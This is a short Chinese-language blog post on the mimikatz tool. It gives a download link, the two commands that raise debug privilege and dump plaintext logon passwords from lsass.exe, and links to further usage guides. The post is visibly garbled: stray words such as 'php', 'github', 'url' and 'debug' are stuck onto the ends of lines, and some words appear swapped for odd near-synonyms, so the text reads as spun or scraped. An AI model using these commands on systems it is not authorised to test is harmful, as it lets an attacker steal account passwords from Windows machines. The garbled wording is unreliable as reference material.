mimikatz是一个法国人写的轻量级调试器。出众之处在于其能够直接从 lsass.exe 里猎取windows处于active状态帐号明文密码,很是强大。php
在网上找了一些相关的文章本身的一点总结吧html
下载地址:https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170409git
mimikatz_trunk为编译好的exe文件github
mimikatz_master为源码文件windows
下面是在我机器上的运行结果:(版本2.1.1,64位OS)sass
这个软件被称为密码抓取神器,mimikatz2.0之后的版本抓取密码很简单,只须要两步:网站
第一条(提高权限)url
privilege::debug
第二条(抓取密码)spa
sekurlsa::logonpasswords
效果图:debug
另外还有一些关于介绍这个软件的网址,信息量很大,不少不懂和未知,可能这款神器还有其余的用处,可是感受下面的内容也有一些版本缘由的“过期”吧:
1.《mimikatz》(英文网站,可是里面的介绍和评论区有不少内容) ;文章地址:http://blog.gentilkiwi.com/mimikatz
2.《mimikatz手册1【窃】》 (没看懂);文章地址:https://betamao.me/mimikatz-man1.html
3.《神器mimikatz使用命令方法总结》(有一些常规命令) ;文章地址:http://www.2cto.com/article/201407/318229.html
4.《关于mimikatz的玩法(私人技巧)》 ;文章地址:http://www.goldfire.cc/index.php/archives/1244